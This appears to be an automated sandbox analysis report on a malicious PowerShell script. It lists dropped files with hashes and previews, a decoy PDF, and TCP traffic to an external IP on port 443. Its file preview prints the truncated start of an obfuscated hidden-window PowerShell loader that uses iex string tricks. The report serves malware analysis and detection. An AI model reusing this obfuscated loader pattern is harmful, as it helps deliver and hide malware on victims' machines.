                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvkosw52.a2l.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-19 06-48-29-899.log

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:ASCII text, with very long lines (393)
                                                                                          Category:dropped
                                                                                          Size (bytes):16525
                                                                                          Entropy (8bit):5.386483451061953
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                                          MD5:F49CA270724D610D1589E217EA78D6D1
                                                                                          SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                                          SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                                          SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                                          Malicious:false
                                                                                          Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):15114
                                                                                          Entropy (8bit):5.36289179225622
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:hZvo2Yjxy7+Qr5dzwE7HP0IxtSUtDxhpdG4mM0GCTQeoiVOvtUgHtgt0xf4Pat14:KyE
                                                                                          MD5:4A79B964F111A04BC92D52D76E59BEFC
                                                                                          SHA1:6CB6A54979A021C76E41B23FDB7DD01572663804
                                                                                          SHA-256:F0276CD1C495392F0F00A758A7FCFE5ED7C4EF35BA3EB3F73BA8A6F727695BD9
                                                                                          SHA-512:18D46ED67784ED4A1363DD6AF281CC1707378D43E606F1C2BF3E4074FC5528C48CAE2D3626128435AF07B9CFFE073101AC4DBF1559B8428594E4F71D72CFA10E
                                                                                          Malicious:false
                                                                                          Preview:SessionID=84ae157b-9565-4165-9fa4-dd0f683a5e11.1734608909933 Timestamp=2024-12-19T06:48:29:933-0500 ThreadID=7128 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=84ae157b-9565-4165-9fa4-dd0f683a5e11.1734608909933 Timestamp=2024-12-19T06:48:29:938-0500 ThreadID=7128 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=84ae157b-9565-4165-9fa4-dd0f683a5e11.1734608909933 Timestamp=2024-12-19T06:48:29:938-0500 ThreadID=7128 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=84ae157b-9565-4165-9fa4-dd0f683a5e11.1734608909933 Timestamp=2024-12-19T06:48:29:938-0500 ThreadID=7128 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=84ae157b-9565-4165-9fa4-dd0f683a5e11.1734608909933 Timestamp=2024-12-19T06:48:29:939-0500 ThreadID=7128 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):35721
                                                                                          Entropy (8bit):5.420257763499499
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRye:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRD
                                                                                          MD5:A659CD9A9B061D13076AAA7D384141AC
                                                                                          SHA1:7A123243014203E6DDF4B783D568122EFBE08377
                                                                                          SHA-256:971AD7A358BB38B7D5E06E6BD8DB880470978D20398BE820DF47DA3707C7466A
                                                                                          SHA-512:B7532E1C8A78C9C8891CA459BCD3CE4B75AA36D7FF1BB3C35EB0D97ECD678A5A161F2A5833C2EE0523190E4BC59DAF579B1E3CFB343AE2B758EF4759BCEC45BA
                                                                                          Malicious:false
                                                                                          Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-

                                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\1a6b65ab-ede0-49b8-8666-afa923979e5a.tmp

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                          Category:dropped
                                                                                          Size (bytes):386528
                                                                                          Entropy (8bit):7.9736851559892425
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                          Malicious:false
                                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\3bb5ee70-2655-49a0-87c7-6b8ce0559f56.tmp

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                          Category:dropped
                                                                                          Size (bytes):1407294
                                                                                          Entropy (8bit):7.97605879016224
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                          MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                          SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                          SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                          SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                          Malicious:false
                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\44a9e39b-d59c-4d83-9855-ec6906ebc728.tmp

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                          Category:dropped
                                                                                          Size (bytes):758601
                                                                                          Entropy (8bit):7.98639316555857
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                          MD5:3A49135134665364308390AC398006F1
                                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                          Malicious:false
                                                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\d1d8cbfb-17f2-4a64-936f-087bdc86376d.tmp

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                          Category:dropped
                                                                                          Size (bytes):1419751
                                                                                          Entropy (8bit):7.976496077007677
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:/9wYIGNPQmeWL07oXGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:lwZG2XWLxXGZN3mlind9i4ufFXpAXkru
                                                                                          MD5:CDB0A9F62FD4871F0603FBBF1FE6BD06
                                                                                          SHA1:C972A2B8E6E7CD72A156C1EAB8F5F31E76A7DA24
                                                                                          SHA-256:85BD3F2168D078DFF0ECEB670C3DC651E8797522C6A2921EC478EAD5A09E415F
                                                                                          SHA-512:7FC3B110A45F9D518FEA45930B73F196FEE7DF472A17FB2CBB19A3BCBF5C78D439F68E2C615D8DACD5821EF60C1447112FB86431D768E28D9F08457563011F28
                                                                                          Malicious:false
                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6225
                                                                                          Entropy (8bit):3.7354375835875424
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:Xb/26kIFCbU203wukvhkvklCywUgo/Zl6iSogZoXJdJaAo/Zl0iSogZoXJdJO1:rO6zFCwrZkvhkvCCtto/ZaHio/ZAHv
                                                                                          MD5:4CA6F687437F97D3A2123762E0E369DD
                                                                                          SHA1:CDD272452B694A0E786177308E6A54395F8BD159
                                                                                          SHA-256:6B91AC91921DE5D0652EE38F46F60DC6B5F0EFC220CFDDEF4A6BF11B48C82817
                                                                                          SHA-512:157CBAB3115E54494DE72E54BA040C9739BD13CADECAD5E5461355FC6EFE870B80C7A684060EF1489D2B6A7D8392948125BE04B2BB1515E38941F2206CBA91AB
                                                                                          Malicious:false
                                                                                          Preview:...................................FL..................F.".. .....*_....$...R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_........R......R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.^..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.^..Roaming.@......EW.=.Y.^...........................]3.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.^..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.^..........................m...W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.^....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.^....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.^....9...........

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SA8DFNBJD2T48IXF597V.temp

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6225
                                                                                          Entropy (8bit):3.7354375835875424
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:Xb/26kIFCbU203wukvhkvklCywUgo/Zl6iSogZoXJdJaAo/Zl0iSogZoXJdJO1:rO6zFCwrZkvhkvCCtto/ZaHio/ZAHv
                                                                                          MD5:4CA6F687437F97D3A2123762E0E369DD
                                                                                          SHA1:CDD272452B694A0E786177308E6A54395F8BD159
                                                                                          SHA-256:6B91AC91921DE5D0652EE38F46F60DC6B5F0EFC220CFDDEF4A6BF11B48C82817
                                                                                          SHA-512:157CBAB3115E54494DE72E54BA040C9739BD13CADECAD5E5461355FC6EFE870B80C7A684060EF1489D2B6A7D8392948125BE04B2BB1515E38941F2206CBA91AB
                                                                                          Malicious:false
                                                                                          Preview:...................................FL..................F.".. .....*_....$...R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_........R......R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.^..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.^..Roaming.@......EW.=.Y.^...........................]3.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.^..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.^..........................m...W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.^....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.^....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.^....9...........

                                                                                          C:\Users\user\Desktop\List of Required items and services.pdf

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                          Category:dropped
                                                                                          Size (bytes):871324
                                                                                          Entropy (8bit):7.827941732382635
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                          MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                                          SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                                          SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                                          SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                                          Malicious:false
                                                                                          Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:ASCII text, with very long lines (841), with no line terminators
                                                                                          Entropy (8bit):5.330940588667174
                                                                                          TrID:
                                                                                            File name:KcKtHBkskI.ps1
                                                                                            File size:841 bytes
                                                                                            MD5:2ba11b739c9f9a18f60a2ada78e3bc41
                                                                                            SHA1:48fe4ec641ea47e5fe34cbf27dce776deabce03f
                                                                                            SHA256:7883e31a07c25e30851390471a8d97e172ec6ec1ec98f49813d166f71cb819a1
                                                                                            SHA512:1d29f6aae05a8e3f85e00a8132fa84fd07d87ecb468fbe5a2f6bbc1bc57f9c48a3f8987acfe59c8fcbae3d007a8504b167633db13e1db8596f7eee9b1bb3d4e1
                                                                                            SSDEEP:24:X1UsIHs0TejWILFWLVjWvQWAa6Kz06vhCDzo2G:4ziKIpiq2Kz0ohCor
                                                                                            TLSH:5F012F895BC721F756A0F91014C84E3B323AC116A2E514B2BEB4822710ACF3C0E8296A
                                                                                            File Content Preview:powershell -win hidden $p57vcf=iex($('[Environment]::GetEmwms'''.Replace('mwm','nvironmentVariable(''public'') + ''\\idj34h.vb')));$flol=iex($('[Environment]::GetEmwms'''.Replace('mwm','nvironmentVariable(''public'') + ''\\npq.vb')));function getit([strin

                                                                                            File Icon

                                                                                            Icon Hash:3270d6baae77db44

                                                                                            Network Behavior

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 19, 2024 12:48:23.107992887 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:23.108037949 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:23.108377934 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:23.116856098 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:23.116895914 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.369580984 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.369678020 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:24.373919964 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:24.373938084 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.374247074 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.385164022 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:24.431329966 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.811399937 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.853724003 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:24.934665918 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.934688091 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.934705019 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.934711933 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.934741974 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.934813023 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:24.934824944 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:24.934907913 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.048826933 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.048860073 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.048960924 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.048980951 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.049036980 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.096555948 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.096589088 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.096681118 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.096702099 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.096751928 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.221685886 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.221714020 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.221873999 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.221873999 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.221894026 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.221951962 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.245533943 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.245551109 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.245825052 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.245834112 CET44349701107.161.23.150192.168.2.7
